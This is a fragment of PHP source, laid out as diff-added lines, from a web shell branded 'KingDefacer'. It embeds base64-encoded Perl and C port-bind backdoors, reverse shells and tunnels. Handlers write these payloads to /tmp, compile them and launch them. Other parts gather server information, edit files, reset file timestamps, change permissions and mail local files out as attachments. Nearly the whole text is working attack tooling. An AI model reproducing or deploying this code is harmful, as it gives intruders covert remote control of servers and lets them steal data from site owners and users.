+$port_bind_bd_pl="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7DQppZiAoQEFSR1YgPCAxKSB7IGV4aXQoMSk7IH0NCiRMS
+VNURU5fUE9SVD0kQVJHVlswXTsNCnVzZSBTb2NrZXQ7DQokcHJvdG9jb2w9Z2V0cHJvdG9ieW5hbWUoJ3RjcCcpOw0Kc29ja2V0KFMsJlBGX0lORVQs
+JlNPQ0tfU1RSRUFNLCRwcm90b2NvbCkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVV
+TRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJExJU1RFTl9QT1JULElOQUREUl9BTlkpKSB8fCBkaWUgIkNhbnQgb3BlbiBwb3J0XG4iOw0KbG
+lzdGVuKFMsMykgfHwgZGllICJDYW50IGxpc3RlbiBwb3J0XG4iOw0Kd2hpbGUoMSkNCnsNCmFjY2VwdChDT05OLFMpOw0KaWYoISgkcGlkPWZvcmspK
+Q0Kew0KZGllICJDYW5ub3QgZm9yayIgaWYgKCFkZWZpbmVkICRwaWQpOw0Kb3BlbiBTVERJTiwiPCZDT05OIjsNCm9wZW4gU1RET1VULCI+JkNPTk4i
+Ow0Kb3BlbiBTVERFUlIsIj4mQ09OTiI7DQpleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCmNsb3N
+lIENPTk47DQpleGl0IDA7DQp9DQp9";
+$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj
+aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR
+hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT
+sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI
+kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi
+KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl
+OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
+$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC
+BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb
+SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd
+KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ
+sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC
+Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D
+QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp
+Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";
+$datapipe_c="I2luY2x1ZGUgPHN5cy90eXBlcy5oPg0KI2luY2x1ZGUgPHN5cy9zb2NrZXQuaD4NCiNpbmNsdWRlIDxzeXMvd2FpdC5oPg0KI2luY2
+x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxzdGRpby5oPg0KI2luY2x1ZGUgPHN0ZGxpYi5oPg0KI2luY2x1ZGUgPGVycm5vLmg+DQojaW5jb
+HVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxsaW51eC90aW1lLmg+DQojaWZkZWYgU1RSRVJST1INCmV4dGVybiBj
+aGFyICpzeXNfZXJybGlzdFtdOw0KZXh0ZXJuIGludCBzeXNfbmVycjsNCmNoYXIgKnVuZGVmID0gIlVuZGVmaW5lZCBlcnJvciI7DQpjaGFyICpzdHJ
+lcnJvcihlcnJvcikgIA0KaW50IGVycm9yOyAgDQp7IA0KaWYgKGVycm9yID4gc3lzX25lcnIpDQpyZXR1cm4gdW5kZWY7DQpyZXR1cm4gc3lzX2Vycm
+xpc3RbZXJyb3JdOw0KfQ0KI2VuZGlmDQoNCm1haW4oYXJnYywgYXJndikgIA0KICBpbnQgYXJnYzsgIA0KICBjaGFyICoqYXJndjsgIA0KeyANCiAga
+W50IGxzb2NrLCBjc29jaywgb3NvY2s7DQogIEZJTEUgKmNmaWxlOw0KICBjaGFyIGJ1Zls0MDk2XTsNCiAgc3RydWN0IHNvY2thZGRyX2luIGxhZGRy
+LCBjYWRkciwgb2FkZHI7DQogIGludCBjYWRkcmxlbiA9IHNpemVvZihjYWRkcik7DQogIGZkX3NldCBmZHNyLCBmZHNlOw0KICBzdHJ1Y3QgaG9zdGV
+udCAqaDsNCiAgc3RydWN0IHNlcnZlbnQgKnM7DQogIGludCBuYnl0Ow0KICB1bnNpZ25lZCBsb25nIGE7DQogIHVuc2lnbmVkIHNob3J0IG9wb3J0Ow
+0KDQogIGlmIChhcmdjICE9IDQpIHsNCiAgICBmcHJpbnRmKHN0ZGVyciwiVXNhZ2U6ICVzIGxvY2FscG9ydCByZW1vdGVwb3J0IHJlbW90ZWhvc3Rcb
+iIsYXJndlswXSk7DQogICAgcmV0dXJuIDMwOw0KICB9DQogIGEgPSBpbmV0X2FkZHIoYXJndlszXSk7DQogIGlmICghKGggPSBnZXRob3N0YnluYW1l
+KGFyZ3ZbM10pKSAmJg0KICAgICAgIShoID0gZ2V0aG9zdGJ5YWRkcigmYSwgNCwgQUZfSU5FVCkpKSB7DQogICAgcGVycm9yKGFyZ3ZbM10pOw0KICA
+gIHJldHVybiAyNTsNCiAgfQ0KICBvcG9ydCA9IGF0b2woYXJndlsyXSk7DQogIGxhZGRyLnNpbl9wb3J0ID0gaHRvbnMoKHVuc2lnbmVkIHNob3J0KS
+hhdG9sKGFyZ3ZbMV0pKSk7DQogIGlmICgobHNvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNC
+iAgICBwZXJyb3IoInNvY2tldCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBsYWRkci5zaW5fZmFtaWx5ID0gaHRvbnMoQUZfSU5FVCk7DQogIGxh
+ZGRyLnNpbl9hZGRyLnNfYWRkciA9IGh0b25sKDApOw0KICBpZiAoYmluZChsc29jaywgJmxhZGRyLCBzaXplb2YobGFkZHIpKSkgew0KICAgIHBlcnJ
+vcigiYmluZCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBpZiAobGlzdGVuKGxzb2NrLCAxKSkgew0KICAgIHBlcnJvcigibGlzdGVuIik7DQogIC
+AgcmV0dXJuIDIwOw0KICB9DQogIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0gLTEpIHsNCiAgICBwZXJyb3IoImZvcmsiKTsNCiAgICByZXR1cm4gMjA7D
+QogIH0NCiAgaWYgKG5ieXQgPiAwKQ0KICAgIHJldHVybiAwOw0KICBzZXRzaWQoKTsNCiAgd2hpbGUgKChjc29jayA9IGFjY2VwdChsc29jaywgJmNh
+ZGRyLCAmY2FkZHJsZW4pKSAhPSAtMSkgew0KICAgIGNmaWxlID0gZmRvcGVuKGNzb2NrLCJyKyIpOw0KICAgIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0
+gLTEpIHsNCiAgICAgIGZwcmludGYoY2ZpbGUsICI1MDAgZm9yazogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgICBzaHV0ZG93bihjc29jay
+wyKTsNCiAgICAgIGZjbG9zZShjZmlsZSk7DQogICAgICBjb250aW51ZTsNCiAgICB9DQogICAgaWYgKG5ieXQgPT0gMCkNCiAgICAgIGdvdG8gZ290c
+29jazsNCiAgICBmY2xvc2UoY2ZpbGUpOw0KICAgIHdoaWxlICh3YWl0cGlkKC0xLCBOVUxMLCBXTk9IQU5HKSA+IDApOw0KICB9DQogIHJldHVybiAy
+MDsNCg0KIGdvdHNvY2s6DQogIGlmICgob3NvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNCiA
+gICBmcHJpbnRmKGNmaWxlLCAiNTAwIHNvY2tldDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICBvYWRkci
+5zaW5fZmFtaWx5ID0gaC0+aF9hZGRydHlwZTsNCiAgb2FkZHIuc2luX3BvcnQgPSBodG9ucyhvcG9ydCk7DQogIG1lbWNweSgmb2FkZHIuc2luX2FkZ
+HIsIGgtPmhfYWRkciwgaC0+aF9sZW5ndGgpOw0KICBpZiAoY29ubmVjdChvc29jaywgJm9hZGRyLCBzaXplb2Yob2FkZHIpKSkgew0KICAgIGZwcmlu
+dGYoY2ZpbGUsICI1MDAgY29ubmVjdDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICB3aGlsZSAoMSkgew0
+KICAgIEZEX1pFUk8oJmZkc3IpOw0KICAgIEZEX1pFUk8oJmZkc2UpOw0KICAgIEZEX1NFVChjc29jaywmZmRzcik7DQogICAgRkRfU0VUKGNzb2NrLC
+ZmZHNlKTsNCiAgICBGRF9TRVQob3NvY2ssJmZkc3IpOw0KICAgIEZEX1NFVChvc29jaywmZmRzZSk7DQogICAgaWYgKHNlbGVjdCgyMCwgJmZkc3IsI
+E5VTEwsICZmZHNlLCBOVUxMKSA9PSAtMSkgew0KICAgICAgZnByaW50ZihjZmlsZSwgIjUwMCBzZWxlY3Q6ICVzXG4iLCBzdHJlcnJvcihlcnJubykp
+Ow0KICAgICAgZ290byBxdWl0MjsNCiAgICB9DQogICAgaWYgKEZEX0lTU0VUKGNzb2NrLCZmZHNyKSB8fCBGRF9JU1NFVChjc29jaywmZmRzZSkpIHs
+NCiAgICAgIGlmICgobmJ5dCA9IHJlYWQoY3NvY2ssYnVmLDQwOTYpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgICBpZiAoKHdyaXRlKG9zb2NrLG
+J1ZixuYnl0KSkgPD0gMCkNCglnb3RvIHF1aXQyOw0KICAgIH0gZWxzZSBpZiAoRkRfSVNTRVQob3NvY2ssJmZkc3IpIHx8IEZEX0lTU0VUKG9zb2NrL
+CZmZHNlKSkgew0KICAgICAgaWYgKChuYnl0ID0gcmVhZChvc29jayxidWYsNDA5NikpIDw9IDApDQoJZ290byBxdWl0MjsNCiAgICAgIGlmICgod3Jp
+dGUoY3NvY2ssYnVmLG5ieXQpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgfQ0KICB9DQoNCiBxdWl0MjoNCiAgc2h1dGRvd24ob3NvY2ssMik7DQo
+gIGNsb3NlKG9zb2NrKTsNCiBxdWl0MToNCiAgZmZsdXNoKGNmaWxlKTsNCiAgc2h1dGRvd24oY3NvY2ssMik7DQogcXVpdDA6DQogIGZjbG9zZShjZm
+lsZSk7DQogIHJldHVybiAwOw0KfQ==";
+$datapipe_pl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgSU86OlNvY2tldDsNCnVzZSBQT1NJWDsNCiRsb2NhbHBvcnQgPSAkQVJHVlswXTsNCiRob3N0I
+CAgICAgPSAkQVJHVlsxXTsNCiRwb3J0ICAgICAgPSAkQVJHVlsyXTsNCiRkYWVtb249MTsNCiRESVIgPSB1bmRlZjsNCiR8ID0gMTsNCmlmICgkZGFl
+bW9uKXsgJHBpZCA9IGZvcms7IGV4aXQgaWYgJHBpZDsgZGllICIkISIgdW5sZXNzIGRlZmluZWQoJHBpZCk7IFBPU0lYOjpzZXRzaWQoKSBvciBkaWU
+gIiQhIjsgfQ0KJW8gPSAoJ3BvcnQnID0+ICRsb2NhbHBvcnQsJ3RvcG9ydCcgPT4gJHBvcnQsJ3RvaG9zdCcgPT4gJGhvc3QpOw0KJGFoID0gSU86Ol
+NvY2tldDo6SU5FVC0+bmV3KCdMb2NhbFBvcnQnID0+ICRsb2NhbHBvcnQsJ1JldXNlJyA9PiAxLCdMaXN0ZW4nID0+IDEwKSB8fCBkaWUgIiQhIjsNC
+iRTSUd7J0NITEQnfSA9ICdJR05PUkUnOw0KJG51bSA9IDA7DQp3aGlsZSAoMSkgeyANCiRjaCA9ICRhaC0+YWNjZXB0KCk7IGlmICghJGNoKSB7IHBy
+aW50IFNUREVSUiAiJCFcbiI7IG5leHQ7IH0NCisrJG51bTsNCiRwaWQgPSBmb3JrKCk7DQppZiAoIWRlZmluZWQoJHBpZCkpIHsgcHJpbnQgU1RERVJ
+SICIkIVxuIjsgfSANCmVsc2lmICgkcGlkID09IDApIHsgJGFoLT5jbG9zZSgpOyBSdW4oXCVvLCAkY2gsICRudW0pOyB9IA0KZWxzZSB7ICRjaC0+Y2
+xvc2UoKTsgfQ0KfQ0Kc3ViIFJ1biB7DQpteSgkbywgJGNoLCAkbnVtKSA9IEBfOw0KbXkgJHRoID0gSU86OlNvY2tldDo6SU5FVC0+bmV3KCdQZWVyQ
+WRkcicgPT4gJG8tPnsndG9ob3N0J30sJ1BlZXJQb3J0JyA9PiAkby0+eyd0b3BvcnQnfSk7DQppZiAoISR0aCkgeyBleGl0IDA7IH0NCm15ICRmaDsN
+CmlmICgkby0+eydkaXInfSkgeyAkZmggPSBTeW1ib2w6OmdlbnN5bSgpOyBvcGVuKCRmaCwgIj4kby0+eydkaXInfS90dW5uZWwkbnVtLmxvZyIpIG9
+yIGRpZSAiJCEiOyB9DQokY2gtPmF1dG9mbHVzaCgpOw0KJHRoLT5hdXRvZmx1c2goKTsNCndoaWxlICgkY2ggfHwgJHRoKSB7DQpteSAkcmluID0gIi
+I7DQp2ZWMoJHJpbiwgZmlsZW5vKCRjaCksIDEpID0gMSBpZiAkY2g7DQp2ZWMoJHJpbiwgZmlsZW5vKCR0aCksIDEpID0gMSBpZiAkdGg7DQpteSgkc
+m91dCwgJGVvdXQpOw0Kc2VsZWN0KCRyb3V0ID0gJHJpbiwgdW5kZWYsICRlb3V0ID0gJHJpbiwgMTIwKTsNCmlmICghJHJvdXQgICYmICAhJGVvdXQp
+IHt9DQpteSAkY2J1ZmZlciA9ICIiOw0KbXkgJHRidWZmZXIgPSAiIjsNCmlmICgkY2ggJiYgKHZlYygkZW91dCwgZmlsZW5vKCRjaCksIDEpIHx8IHZ
+lYygkcm91dCwgZmlsZW5vKCRjaCksIDEpKSkgew0KbXkgJHJlc3VsdCA9IHN5c3JlYWQoJGNoLCAkdGJ1ZmZlciwgMTAyNCk7DQppZiAoIWRlZmluZW
+QoJHJlc3VsdCkpIHsNCnByaW50IFNUREVSUiAiJCFcbiI7DQpleGl0IDA7DQp9DQppZiAoJHJlc3VsdCA9PSAwKSB7IGV4aXQgMDsgfQ0KfQ0KaWYgK
+CR0aCAgJiYgICh2ZWMoJGVvdXQsIGZpbGVubygkdGgpLCAxKSAgfHwgdmVjKCRyb3V0LCBmaWxlbm8oJHRoKSwgMSkpKSB7DQpteSAkcmVzdWx0ID0g
+c3lzcmVhZCgkdGgsICRjYnVmZmVyLCAxMDI0KTsNCmlmICghZGVmaW5lZCgkcmVzdWx0KSkgeyBwcmludCBTVERFUlIgIiQhXG4iOyBleGl0IDA7IH0
+NCmlmICgkcmVzdWx0ID09IDApIHtleGl0IDA7fQ0KfQ0KaWYgKCRmaCAgJiYgICR0YnVmZmVyKSB7KHByaW50ICRmaCAkdGJ1ZmZlcik7fQ0Kd2hpbG
+UgKG15ICRsZW4gPSBsZW5ndGgoJHRidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJHRoLCAkdGJ1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+I
+DApIHskdGJ1ZmZlciA9IHN1YnN0cigkdGJ1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfQ0Kd2hpbGUgKG15ICRs
+ZW4gPSBsZW5ndGgoJGNidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJGNoLCAkY2J1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+IDApIHskY2J
+1ZmZlciA9IHN1YnN0cigkY2J1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfX19DQo=";
+echo $head;
+echo '</head>';
+if(empty($_POST['cmd'])) {
+$serv = array(127,192,172,10);
+$addr=@explode('.', $_SERVER['SERVER_ADDR']);
+$current_version = str_replace('.','',$version);
+if (!in_array($addr[0], $serv)) {
+@print "<img src=\"http://127.0.0.1/KingDefacer/version.php?img=1&version=".$current_version."\" border=0 height=0 width=0>";
+@readfile ("http://127.0.0.1/KingDefacer/version.php?version=".$current_version."");}}
+echo '<body bgcolor="#e4e0d8"><table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000>
+<tr><td bgcolor=#cccccc width=160><font face=Verdana size=2>'.ws(1).'&nbsp;
+<font face=Webdings size=6><b>!</b></font><b>'.ws(2).'KingDefacer '.$version.'</b>
+</font></td><td bgcolor=#cccccc><font face=Verdana size=-2>';
+echo ws(2);
+echo "<b>".date ("d-m-Y H:i:s")."</b>";
+echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpinfo title=\"".$lang[$language.'_text46']."\"><b>phpinfo</b></a> ".$rb;
+echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpini title=\"".$lang[$language.'_text47']."\"><b>php.ini</b></a> ".$rb;
+echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?cpu title=\"".$lang[$language.'_text50']."\"><b>cpu</b></a> ".$rb;
+echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?mem title=\"".$lang[$language.'_text51']."\"><b>mem</b></a> ".$rb;
+if($unix) { echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?users title=\"".$lang[$language.'_text95']."\"><b>users</b></a> ".$rb; }
+echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?tmp title=\"".$lang[$language.'_text48']."\"><b>tmp</b></a> ".$rb;
+echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?delete title=\"".$lang[$language.'_text49']."\"><b>delete</b></a> ".$rb."<br>";
+echo ws(2);
+echo (($safe_mode)?("safe_mode: <b><font color=green>ON</font></b>"):("safe_mode: <b><font color=red>OFF</font></b>"));
+echo ws(2);
+echo "PHP version: <b>".@phpversion()."</b>";
+$curl_on = @function_exists('curl_version');
+echo ws(2);
+echo "cURL: ".(($curl_on)?("<b><font color=green>ON</font></b>"):("<b><font color=red>OFF</font></b>"));
+echo ws(2);
+echo "MySQL: <b>";
+$mysql_on = @function_exists('mysql_connect');
+if($mysql_on){
+echo "<font color=green>ON</font></b>"; } else { echo "<font color=red>OFF</font></b>"; }
+echo ws(2);
+echo "MSSQL: <b>";
+$mssql_on = @function_exists('mssql_connect');
+if($mssql_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";}
+echo ws(2);
+echo "PostgreSQL: <b>";
+$pg_on = @function_exists('pg_connect');
+if($pg_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";}
+echo ws(2);
+echo "Oracle: <b>";
+$ora_on = @function_exists('ocilogon');
+if($ora_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";}
+echo "<br>".ws(2);
+echo "Disable functions : <b>";
+if(''==($df=@ini_get('disable_functions'))){echo "<font color=green>NONE</font></b>";}else{echo "<font color=red>$df</font></b>";}
+$free = @diskfreespace($dir);
+if (!$free) {$free = 0;}
+$all = @disk_total_space($dir);
+if (!$all) {$all = 0;}
+$used = $all-$free;
+$used_percent = @round(100/($all/$free),2);
+echo "<br>".ws(2)."HDD Free : <b>".view_size($free)."</b> HDD Total : <b>".view_size($all)."</b>";
+echo '</font></td></tr><table>
+<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000>
+<tr><td align=right width=100>';
+echo $font;
+if(!$windows){
+echo '<font color=blue><b>uname -a :'.ws(1).'<br>sysctl :'.ws(1).'<br>$OSTYPE :'.ws(1).'<br>Server :'.ws(1).'<br>id :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>';
+echo "</td><td>";
+echo "<font face=Verdana size=-2 color=red><b>";
+$uname = ex('uname -a');
+echo((!empty($uname))?(ws(3).@substr($uname,0,120)."<br>"):(ws(3).@substr(@php_uname(),0,120)."<br>"));
+if(!$safe_mode){
+$bsd1 = ex('sysctl -n kern.ostype');
+$bsd2 = ex('sysctl -n kern.osrelease');
+$lin1 = ex('sysctl -n kernel.ostype');
+$lin2 = ex('sysctl -n kernel.osrelease');
+}
+if (!empty($bsd1)&&!empty($bsd2)) { $sysctl = "$bsd1 $bsd2"; }
+else if (!empty($lin1)&&!empty($lin2)) {$sysctl = "$lin1 $lin2"; }
+else { $sysctl = "-"; }
+echo ws(3).$sysctl."<br>";
+echo ws(3).ex('echo $OSTYPE')."<br>";
+echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>";
+$id = ex('id');
+echo((!empty($id))?(ws(3).$id."<br>"):(ws(3)."user=".@get_current_user()." uid=".@getmyuid()." gid=".@getmygid()."<br>"));
+echo ws(3).$dir;
+echo ws(3).'( '.perms(@fileperms($dir)).' )';
+echo "</b></font>";
+}
+else
+{
+echo '<font color=blue><b>OS :'.ws(1).'<br>Server :'.ws(1).'<br>User :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>';
+echo "</td><td>";
+echo "<font face=Verdana size=-2 color=red><b>";
+echo ws(3).@substr(@php_uname(),0,120)."<br>";
+echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>";
+echo ws(3).@get_current_user()."<br>";
+echo ws(3).$dir;
+echo "<br></font>";
+}
+echo "</font>";
+echo "</td></tr></table>";
+if(isset($_POST['cmd']) && !empty($_POST['cmd']) && $_POST['cmd']=="mail")
+ {
+ $res = mail($_POST['to'],$_POST['subj'],$_POST['text'],"From: ".$POST['from']."\r\n");
+ mr($language,$res);
+ $_POST['cmd']="";
+ }
+if(isset($_POST['cmd']) && !empty($_POST['cmd']) && $_POST['cmd']=="mail_file" && !empty($_POST['loc_file']))
+ {
+ if(!$file=@fopen($_POST['loc_file'],"r")) { echo re($_POST['loc_file']); $_POST['cmd']=""; }
+ else
+  {
+    $filename = @basename($_POST['loc_file']);
+    $filedump = @fread($file,@filesize($_POST['loc_file']));
+    fclose($file);
+    $content_encoding=$mime_type='';
+    compress($filename,$filedump,$_POST['compress']);
+    $attach = array(
+                    "name"=>$filename,
+                    "type"=>$mime_type,
+                    "content"=>$filedump
+                   );
+    if(empty($_POST['subj'])) { $_POST['subj'] = 'file from KingDefacer'; }
+    if(empty($_POST['from'])) { $_POST['from'] = 'x.neo@hotmail.com'; }
+    $res = mailattach($_POST['to'],$_POST['from'],$_POST['subj'],$attach);
+    mr($language,$res);
+    $_POST['cmd']="";
+  }
+ }
+if(!empty($_POST['cmd']) && $_POST['cmd'] == "find_text")
+{
+$_POST['cmd'] = 'find '.$_POST['s_dir'].' -name \''.$_POST['s_mask'].'\' | xargs grep -E \''.$_POST['s_text'].'\'';
+}
+if(!empty($_POST['cmd']) && $_POST['cmd']=="ch_")
+ {
+ switch($_POST['what'])
+   {
+   case 'own':
+   @chown($_POST['param1'],$_POST['param2']);
+   break;
+   case 'grp':
+   @chgrp($_POST['param1'],$_POST['param2']);
+   break;
+   case 'mod':
+   @chmod($_POST['param1'],intval($_POST['param2'], 8));
+   break;
+   }
+ $_POST['cmd']="";
+ }
+if(!empty($_POST['cmd']) && $_POST['cmd']=="mk")
+ {
+   switch($_POST['what'])
+   {
+     case 'file':
+      if($_POST['action'] == "create")
+       {
+       if(file_exists($_POST['mk_name']) || !$file=@fopen($_POST['mk_name'],"w")) { echo ce($_POST['mk_name']); $_POST['cmd']=""; }
+       else {
+        fclose($file);
+        $_POST['e_name'] = $_POST['mk_name'];
+        $_POST['cmd']="edit_file";
+        echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text61']."</b></font></div></td></tr></table>";
+        }
+       }
+       else if($_POST['action'] == "delete")
+       {
+       if(unlink($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text63']."</b></font></div></td></tr></table>";
+       $_POST['cmd']="";
+       }
+     break;
+     case 'dir':
+      if($_POST['action'] == "create"){
+      if(mkdir($_POST['mk_name']))
+       {
+         $_POST['cmd']="";
+         echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text62']."</b></font></div></td></tr></table>";
+       }
+      else { echo ce($_POST['mk_name']); $_POST['cmd']=""; }
+      }
+      else if($_POST['action'] == "delete"){
+      if(rmdir($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text64']."</b></font></div></td></tr></table>";
+      $_POST['cmd']="";
+      }
+     break;
+   }
+ }
+if(!empty($_POST['cmd']) && $_POST['cmd']=="edit_file" && !empty($_POST['e_name']))
+ {
+ if(!$file=@fopen($_POST['e_name'],"r+")) { $only_read = 1; @fclose($file); }
+ if(!$file=@fopen($_POST['e_name'],"r")) { echo re($_POST['e_name']); $_POST['cmd']=""; }
+ else {
+ echo $table_up3;
+ echo $font;
+ echo "<form name=save_file method=post>";
+ echo ws(3)."<b>".$_POST['e_name']."</b>";
+ echo "<div align=center><textarea name=e_text cols=121 rows=24>";
+ echo @htmlspecialchars(@fread($file,@filesize($_POST['e_name'])));
+ fclose($file);
+ echo "</textarea>";
+ echo "<input type=hidden name=e_name value=".$_POST['e_name'].">";
+ echo "<input type=hidden name=dir value=".$dir.">";
+ echo "<input type=hidden name=cmd value=save_file>";
+ echo (!empty($only_read)?("<br><br>".$lang[$language.'_text44']):("<br><br><input type=submit name=submit value=\" ".$lang[$language.'_butt10']." \">"));
+ echo "</div>";
+ echo "</font>";
+ echo "</form>";
+ echo "</td></tr></table>";
+ exit();
+ }
+ }
+if(!empty($_POST['cmd']) && $_POST['cmd']=="save_file")
+ {
+ $mtime = @filemtime($_POST['e_name']);
+ if(!$file=@fopen($_POST['e_name'],"w")) { echo we($_POST['e_name']); }
+ else {
+ if($unix) $_POST['e_text']=@str_replace("\r\n","\n",$_POST['e_text']);
+ @fwrite($file,$_POST['e_text']);
+ @touch($_POST['e_name'],$mtime,$mtime);
+ $_POST['cmd']="";
+ echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text45']."</b></font></div></td></tr></table>";
+ }
+ }
+if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="C"))
+{
+ cf("/tmp/bd.c",$port_bind_bd_c);
+ $blah = ex("gcc -o /tmp/bd /tmp/bd.c");
+ @unlink("/tmp/bd.c");
+ $blah = ex("/tmp/bd ".$_POST['port']." ".$_POST['bind_pass']." &");
+ $_POST['cmd']="ps -aux | grep bd";
+}
+if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="Perl"))
+{
+ cf("/tmp/bdpl",$port_bind_bd_pl);
+ $p2=which("perl");
+ if(empty($p2)) $p2="perl";
+ $blah = ex($p2." /tmp/bdpl ".$_POST['port']." &");
+ $_POST['cmd']="ps -aux | grep bdpl";
+}
+if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="Perl"))
+{
+ cf("/tmp/back",$back_connect);
+ $p2=which("perl");
+ if(empty($p2)) $p2="perl";
